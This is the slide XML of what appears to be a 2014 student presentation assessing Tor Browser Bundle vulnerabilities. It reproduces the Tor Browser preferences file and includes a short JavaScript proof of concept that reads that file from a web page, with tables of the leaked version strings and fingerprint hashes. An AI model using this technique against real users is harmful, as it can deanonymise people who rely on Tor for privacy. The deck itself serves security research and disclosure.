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7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80" r:id="rId15"/>
    <p:sldId id="281" r:id="rId16"/>
    <p:sldId id="279" r:id="rId17"/>
    <p:sldId id="282" r:id="rId18"/>
    <p:sldId id="283" r:id="rId19"/>
    <p:sldId id="288" r:id="rId20"/>
    <p:sldId id="284" r:id="rId21"/>
    <p:sldId id="285" r:id="rId22"/>
    <p:sldId id="286" r:id="rId23"/>
    <p:sldId id="287" r:id="rId24"/>
    <p:sldId id="289" r:id="rId25"/>
    <p:sldId id="290" r:id="rId26"/>
    <p:sldId id="291" r:id="rId27"/>
    <p:sldId id="292" r:id="rId28"/>
    <p:sldId id="293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CD35"/>
    <a:srgbClr val="1AA02A"/>
    <a:srgbClr val="990000"/>
    <a:srgbClr val="FF9900"/>
    <a:srgbClr val="255691"/>
    <a:srgbClr val="00B050"/>
    <a:srgbClr val="DDDDDD"/>
    <a:srgbClr val="8CEC9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1" autoAdjust="0"/>
    <p:restoredTop sz="94636" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="109" d="100"/>
          <a:sy n="109" d="100"/>
        </p:scale>
        <p:origin x="-208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7BE6-9F74-4228-B3AE-5E09AD2B4399}" type="datetimeFigureOut">
              <a:rPr lang="en-CA" smtClean="0"/>
              <a:pPr/>
              <a:t>2014-04-07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0BD59-E5A1-4113-B802-70A7C3A0A880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0BD59-E5A1-4113-B802-70A7C3A0A880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0BD59-E5A1-4113-B802-70A7C3A0A880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pa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949"/>
            <a:ext cx="9144000" cy="1117795"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr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49280"/>
            <a:ext cx="9144000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202148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6696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7740352" y="-27384"/>
            <a:ext cx="1381724" cy="13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6696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5000" contrast="-9000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6948264" y="-27384"/>
            <a:ext cx="21127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6696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6696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7608070" y="0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18114"/>
            <a:ext cx="1557928" cy="15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959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8264" y="-27742"/>
            <a:ext cx="2304734" cy="17285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9357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48264" y="-27742"/>
            <a:ext cx="2304734" cy="17285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33798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266" y="-27981"/>
            <a:ext cx="2304734" cy="28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73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9266" y="-27981"/>
            <a:ext cx="2304734" cy="28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798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2280" y="-459432"/>
            <a:ext cx="1944216" cy="19442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56180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01487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2280" y="-459432"/>
            <a:ext cx="1944216" cy="19442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80849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44624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80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44624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49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099" y="-239296"/>
            <a:ext cx="1868096" cy="18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581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0418" name="Picture 2" descr="http://thumbs.dreamstime.com/z/fingerprint-1595020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rcRect l="8331" t="842" r="8551" b="7004"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7668344" y="0"/>
            <a:ext cx="1224136" cy="1452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581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099" y="-239296"/>
            <a:ext cx="1868096" cy="18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50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3044" y="0"/>
            <a:ext cx="1412776" cy="14127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38516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3044" y="0"/>
            <a:ext cx="1412776" cy="14127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80085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534" y="-459432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16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534" y="-459432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85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43074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52320" y="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95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52320" y="0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49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3" y="-434951"/>
            <a:ext cx="2135759" cy="21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95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3" y="-434951"/>
            <a:ext cx="2135759" cy="21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49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24816"/>
            <a:ext cx="1376662" cy="13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5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24816"/>
            <a:ext cx="1376662" cy="13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44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4614" y="0"/>
            <a:ext cx="1359386" cy="135938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976932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4614" y="0"/>
            <a:ext cx="1359386" cy="135938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42358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-9939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932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-9939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358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1073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3733" y="72457"/>
            <a:ext cx="2400267" cy="83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86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3733" y="72457"/>
            <a:ext cx="2400267" cy="83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97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3382" y="125306"/>
            <a:ext cx="1620616" cy="12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86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3382" y="125306"/>
            <a:ext cx="1620616" cy="12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97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gradFill flip="none" rotWithShape="1">
          <a:gsLst>
            <a:gs pos="29000">
              <a:srgbClr val="EAEEF4"/>
            </a:gs>
            <a:gs pos="22000">
              <a:srgbClr val="E1E7EF"/>
            </a:gs>
            <a:gs pos="14000">
              <a:srgbClr val="CBD5E3"/>
            </a:gs>
            <a:gs pos="6000">
              <a:srgbClr val="A2B4CE"/>
            </a:gs>
            <a:gs pos="1000">
              <a:srgbClr val="6885B0"/>
            </a:gs>
            <a:gs pos="0">
              <a:schemeClr val="bg1">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="48000">
              <a:schemeClr val="bg1">
                <a:lumMod val="100000"/>
                <a:alpha val="5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98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245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 flip="none" rotWithShape="1">
          <a:gsLst>
            <a:gs pos="14000">
              <a:srgbClr val="6885B0"/>
            </a:gs>
            <a:gs pos="0">
              <a:schemeClr val="bg1">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="15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7798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9361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36"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="993474"/>
            <a:ext cx="9144000" cy="58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421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7907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87552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18114"/>
            <a:ext cx="1557928" cy="15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96696"/>
            <a:ext cx="9144000" cy="586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6444208" cy="93610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6993128" y="-27384"/>
            <a:ext cx="204336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95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6885B0"/>
            </a:gs>
            <a:gs pos="0">
              <a:schemeClr val="bg1">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="15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712565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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="coverpage.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId47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2000" contrast="-27000"/>
          </a:blip>
          <a:srcRect b="94314"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-24"/>
            <a:ext cx="9144000" cy="9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527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99" r:id="rId9"/>
    <p:sldLayoutId id="2147483700" r:id="rId10"/>
    <p:sldLayoutId id="2147483701" r:id="rId11"/>
    <p:sldLayoutId id="2147483703" r:id="rId12"/>
    <p:sldLayoutId id="2147483702" r:id="rId13"/>
    <p:sldLayoutId id="2147483675" r:id="rId14"/>
    <p:sldLayoutId id="2147483669" r:id="rId15"/>
    <p:sldLayoutId id="2147483676" r:id="rId16"/>
    <p:sldLayoutId id="2147483687" r:id="rId17"/>
    <p:sldLayoutId id="2147483688" r:id="rId18"/>
    <p:sldLayoutId id="2147483667" r:id="rId19"/>
    <p:sldLayoutId id="2147483677" r:id="rId20"/>
    <p:sldLayoutId id="2147483689" r:id="rId21"/>
    <p:sldLayoutId id="2147483690" r:id="rId22"/>
    <p:sldLayoutId id="2147483668" r:id="rId23"/>
    <p:sldLayoutId id="2147483704" r:id="rId24"/>
    <p:sldLayoutId id="2147483678" r:id="rId25"/>
    <p:sldLayoutId id="2147483663" r:id="rId26"/>
    <p:sldLayoutId id="2147483679" r:id="rId27"/>
    <p:sldLayoutId id="2147483691" r:id="rId28"/>
    <p:sldLayoutId id="2147483692" r:id="rId29"/>
    <p:sldLayoutId id="2147483684" r:id="rId30"/>
    <p:sldLayoutId id="2147483685" r:id="rId31"/>
    <p:sldLayoutId id="2147483693" r:id="rId32"/>
    <p:sldLayoutId id="2147483694" r:id="rId33"/>
    <p:sldLayoutId id="2147483670" r:id="rId34"/>
    <p:sldLayoutId id="2147483680" r:id="rId35"/>
    <p:sldLayoutId id="2147483672" r:id="rId36"/>
    <p:sldLayoutId id="2147483681" r:id="rId37"/>
    <p:sldLayoutId id="2147483695" r:id="rId38"/>
    <p:sldLayoutId id="2147483696" r:id="rId39"/>
    <p:sldLayoutId id="2147483673" r:id="rId40"/>
    <p:sldLayoutId id="2147483682" r:id="rId41"/>
    <p:sldLayoutId id="2147483697" r:id="rId42"/>
    <p:sldLayoutId id="2147483698" r:id="rId43"/>
    <p:sldLayoutId id="2147483674" r:id="rId44"/>
    <p:sldLayoutId id="2147483686" r:id="rId4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ugzilla.mozilla.org/show_bug.cgi?id=878890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startpage.com/do/search?q=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C:\Users\Dan\Documents\p.xbit.ca\Courses\ECE9609b\project%20talk\winscantest_edited0032-0800.avi" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/video" Target="file:///C:\Users\Dan\Documents\p.xbit.ca\Courses\ECE9609b\project%20talk\linux_test_edited.mp40001-0610.avi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Dan\Documents\p.xbit.ca\Courses\ECE9609b\project%20talk\linux_brows_edited.mp40026-4647.avi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3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/video" Target="file:///C:\Users\Dan\Documents\p.xbit.ca\Courses\ECE9609b\project%20talk\proxy5_edited0001-2417.av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0" y="188640"/>
            <a:ext cx="9144000" cy="1656184"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw blurRad="76200" dir="18900000" sx="140000" sy="140000" kx="-1200000" algn="b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CA" sz="40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Vulnerability Assessment of the Tor Browser Bundle and Potential </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="4000" b="1" dirty="0" err="1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MitM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="40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Attacks from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="4000" b="1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Exit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="4000" b="1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Nodes</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-CA" sz="4000" b="1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0" y="6093296"/>
            <a:ext cx="9144000" cy="576064"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw blurRad="76200" dir="18900000" sx="140000" sy="140000" kx="-1200000" algn="b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CA" sz="3200" b="1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ECE9609 Project Presentations by Daniel Servos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CA" sz="4000" b="1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9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6309320"/>
            <a:ext cx="9144000" cy="576064"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw blurRad="76200" dir="18900000" sx="140000" sy="140000" kx="-1200000" algn="b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24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April</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" noProof="0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7</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="30000" noProof="0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2400" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" noProof="0" dirty="0" smtClean="0">
                <a:ln w="3175"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2014</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-CA" sz="2400" b="1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7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 smtClean="0"/>
              <a:t>fingerprintjs</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="win8.1_tor_3.5.1_fing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628800"/>
            <a:ext cx="5842323" cy="5167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0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Windows + Tor Browser 5.3.1 + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>enUS</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA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80728"/>
            <a:ext cx="90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Windows + Tor Browser 5.3.2 + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>enUS</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="3600" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="win8.1_tor_3.5.2_fing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060848"/>
            <a:ext cx="5824336" cy="446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96" y="980728"/>
            <a:ext cx="90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Windows + Tor Browser 5.3.3 + pl</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="3600" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="win8.1_tor_3.5.3pl_fing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060848"/>
            <a:ext cx="5860679" cy="43924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936" y="980728"/>
            <a:ext cx="904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Linux + Tor Browser 5.3.1 + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>enUS</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="3600" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11" descr="linux_tor_3.5.1_fing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628800"/>
            <a:ext cx="5832648" cy="5148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344816" cy="54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100392" cy="936104"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-CA" sz="4400" dirty="0" smtClean="0"/>
              <a:t>resource:///defaults/preferences/</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="4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9512" y="1043444"/>
            <a:ext cx="8784976" cy="24211563"/>
            <a:chOff x="179512" y="1043444"/>
            <a:chExt cx="8784976" cy="24211563"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="TextBox 3"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="179512" y="1043444"/>
              <a:ext cx="4032448" cy="3693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255691"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>000-tor-browser.js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1340768"/>
              <a:ext cx="8712968" cy="239142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//@line 4 "/home/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ubuntu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/build/tor-browser/browser/app/profile/000-tor-browser.js"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Disable browser auto updaters and associated homepage notifications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app.update.auto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app.update.enabled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browser.search.update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("browser.rights.3.shown",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browser.startup.homepage_override.mstone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"ignore");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startup.homepage_welcome_url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startup.homepage_override_url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Disk activity: Disable Browsing History Storage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browser.privatebrowsing.autostart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browser.cache.disk.enable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browser.cache.offline.enable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dom.indexedDB.enabled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permissions.memory_only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network.cookie.lifetimePolicy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2);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browser.download.manager.retention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Disk activity: TBB Directory Isolation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browser.download.useDownloadDir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browser.shell.checkDefaultBrowser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browser.download.manager.addToRecentDocs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Misc privacy: Disk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signon.rememberSignons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browser.formfill.enable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signon.autofillForms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browser.sessionstore.privacy_level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2);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media.cache_size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0);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Misc privacy: Remote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browser.send_pings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geo.enabled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geo.wifi.uri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browser.search.suggest.enabled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browser.safebrowsing.enabled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browser.safebrowsing.malware.enabled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browser.download.manager.scanWhenDone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prevents AV remote reporting of downloads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extensions.ui.lastCategory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"addons://list/extension");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datareporting.healthreport.service.enabled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Yes, all three of these must be set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datareporting.healthreport.uploadEnabled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datareporting.policy.dataSubmissionEnabled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security.mixed_content.block_active_content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Disable until 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  <a:hlinkClick r:id="rId3"/>
                </a:rPr>
                <a:t>https://bugzilla.mozilla.org/show_bug.cgi?id=878890 is patched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browser.syncPromoViewsLeftMap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"{\"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addons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\":0, \"passwords\":0, \"bookmarks\":0}"); // Don't promote sync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services.sync.engine.prefs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Never sync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,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addons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, or tabs with other browsers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services.sync.engine.addons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services.sync.engine.tabs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// Fingerprinting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webgl.min_capability_mode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webgl.disable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-extensions", true);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dom.battery.enabled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false); // fingerprinting due to differing OS implementations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dom.network.enabled",false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); // fingerprinting due to differing OS implementations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("browser.display.max_font_attempts",10);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("browser.display.max_font_count",10);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gfx.downloadable_fonts.fallback_delay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-1);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general.appname.override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"Netscape");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general.appversion.override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"5.0 (Windows)");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general.oscpu.override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"Windows NT 6.1");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general.platform.override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"Win32");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general.useragent.override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"Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0");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general.productSub.override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"20100101");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general.buildID.override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"20100101");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browser.startup.homepage_override.buildID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"20100101");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general.useragent.vendor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general.useragent.vendorSub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dom.enable_performance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plugin.expose_full_path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browser.zoom.siteSpecific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intl.charset.default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"windows-1252");</a:t>
              </a:r>
            </a:p>
            <a:p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//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intl.accept_languages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"en-us, en"); // Set by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Torbutton</a:t>
              </a:r>
              <a:endParaRPr lang="en-CA" sz="1050" b="1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//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intl.accept_charsets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"iso-8859-1,*,utf-8"); // Set by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Torbutton</a:t>
              </a:r>
              <a:endParaRPr lang="en-CA" sz="1050" b="1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//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intl.charsetmenu.browser.cache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"UTF-8"); // Set by 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Torbutton</a:t>
              </a:r>
              <a:endParaRPr lang="en-CA" sz="1050" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:endParaRP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Third party stuff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network.cookie.cookieBehavior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security.enable_tls_session_tickets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network.http.spdy.enabled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Stores state and may have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keepalive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issues (both fixable)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("network.http.spdy.enabled.v2", false); // Seems redundant, but just in case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("network.http.spdy.enabled.v3", false); // Seems redundant, but just in case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Proxy and proxy security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network.proxy.socks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"127.0.0.1");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network.proxy.socks_port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9150);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network.proxy.socks_remote_dns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network.proxy.no_proxies_on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""); // For fingerprinting and local service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vulns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(#10419)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network.proxy.type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network.security.ports.banned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"9050,9051,9150,9151");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network.dns.disablePrefetch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handler.external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-default",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network.protocol-handler.external.mailto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network.protocol-handler.external.news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network.protocol-handler.external.nntp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network.protocol-handler.external.snews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network.protocol-handler.warn-external.mailto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network.protocol-handler.warn-external.news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network.protocol-handler.warn-external.nntp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network.protocol-handler.warn-external.snews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plugins.click_to_play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plugin.state.flash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plugins.hide_infobar_for_missing_plugin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media.peerconnection.enabled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 // Disable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WebRTC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interfaces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Network and performance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network.http.pipelining.aggressive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network.http.pipelining.maxrequests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12);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network.http.pipelining.ssl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network.http.proxy.pipelining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security.ssl.enable_false_start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network.http.keep-alive.timeout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20);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network.http.connection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-retry-timeout", 0);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network.http.max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-persistent-connections-per-proxy", 256);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network.http.pipelining.reschedule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-timeout", 15000);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network.http.pipelining.read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-timeout", 60000);</a:t>
              </a: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Hacked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: Now means "Attempt to pipeline at least this many requests together"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network.http.pipelining.max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-optimistic-requests", 3);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Extension support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extensions.autoDisableScopes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0);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extensions.bootstrappedAddons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"{}");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("extensions.checkCompatibility.4.*",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extensions.databaseSchema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3);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extensions.enabledAddons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"https-everywhere%40eff.org:3.1.4,%7B73a6fe31-595d-460b-a920-fcc0f8843232%7D:2.6.6.1,torbutton%40torproject.org:1.5.2,ubufox%40ubuntu.com:2.6,tor-launcher%40torproject.org:0.1.1pre-alpha,%7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:17.0.5");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extensions.enabledItems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"langpack-en-US@firefox.mozilla.org:,{73a6fe31-595d-460b-a920-fcc0f8843232}:1.9.9.57,{e0204bd5-9d31-402b-a99d-a6aa8ffebdca}:1.2.4,{972ce4c6-7e08-4474-a285-3208198ce6fd}:3.5.8");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extensions.enabledScopes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1);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extensions.pendingOperations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false);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xpinstall.whitelist.add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"");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("xpinstall.whitelist.add.36", "");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Omnibox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settings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("keyword.URL", "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  <a:hlinkClick r:id="rId4"/>
                </a:rPr>
                <a:t>https://startpage.com/do/search?q=");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Hacks/workarounds: Direct2D seems to crash w/ lots of video cards w/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MinGW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?</a:t>
              </a:r>
            </a:p>
            <a:p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//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Nvida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cards also experience crashes without the second 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 set to disabled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("gfx.direct2d.disabled", true);</a:t>
              </a:r>
            </a:p>
            <a:p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dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>layers.acceleration.disabled</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-CA" sz="1050" dirty="0" smtClean="0">
                  <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>", true);</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en" sz="1050" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p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// Version placeholder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torbrowser.version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"3.5.3-Windows");</a:t>
              </a:r>
            </a:p>
            <a:p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pref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("</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-CA" sz="1050" b="1" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>general.useragent.locale</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-CA" sz="1050" b="1" dirty="0" smtClean="0">
                  <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>", "en-US");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5.34351E-7 L 0 -1.227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2762 L 0 -2.717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028384" cy="936104"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-CA" sz="4400" dirty="0" smtClean="0"/>
              <a:t>resource:///defaults/preferences/</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179512" y="4437112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&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r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=“resource:///defaults/preferences/000-tor-browser.js“&gt;&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="16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420888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&lt;div id=“report”&gt;&lt;/div&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1600" b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&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p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600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r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 div = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.getElementById</a:t>
            </a:r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('report'); </a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1600" b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   function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pref</a:t>
            </a:r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(var1, var2) {</a:t>
            </a:r>
          </a:p>
          <a:p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600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>div.innerHTML</a:t>
            </a:r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 += "&lt;b&gt;“ + var1 + "&lt;/b&gt;: “ + var2 + "&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/&gt;\n";</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1600" b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   }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CA" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="1600" b="1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299349" cy="538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99592" y="4149080"/>
            <a:ext cx="1800200" cy="216024"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="21CD35">
              <a:alpha val="50000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="1AA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899592" y="6165304"/>
            <a:ext cx="1728192" cy="216024"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="21CD35">
              <a:alpha val="50000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="1AA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Platform Comparison</a:t>
            </a:r>
            <a:endParaRPr lang="en-CA" sz="4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512" y="2090018"/>
          <a:ext cx="8784972" cy="335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2"/>
                <a:gridCol w="1464162"/>
                <a:gridCol w="1464162"/>
                <a:gridCol w="1464162"/>
                <a:gridCol w="1464162"/>
                <a:gridCol w="1464162"/>
              </a:tblGrid>
              <a:tr h="909986"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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> 8.1 64bit</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Tor 3.5.1</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>en-US</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-CA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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> 8.1 64bit</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Tor 3.5.2</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>en-US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 8.1 64bit</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Tor 3.5.3</a:t>
                      </a:r>
                    </a:p>
                    <a:p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 8.1 64bit</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Tor 3.5.3</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/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Gentoo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t> 64bit</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t>Tor 3.5.1</a:t>
                      </a:r>
                    </a:p>
                    <a:p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/>
                </a:tc>
              </a:tr>
              <a:tr h="6369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torbrowser.version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3.5.1-Windows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3.5.2-Windows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3.5.3-Windows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3.5.3-Windows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3.5.1-Linux</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-CA" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="5896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general.user.useragent.locale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en-US</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-CA" dirty="0"/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CA" sz="1600" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Fingerprintjs</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-CA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Hash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823976034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823976034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823976034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823976034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823976034</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-CA" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="63193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>
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Pref</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b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Hash</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-CA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1" dirty="0" smtClean="0"/>
                        <a:t>-404588605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-795388156</a:t>
                      </a:r>
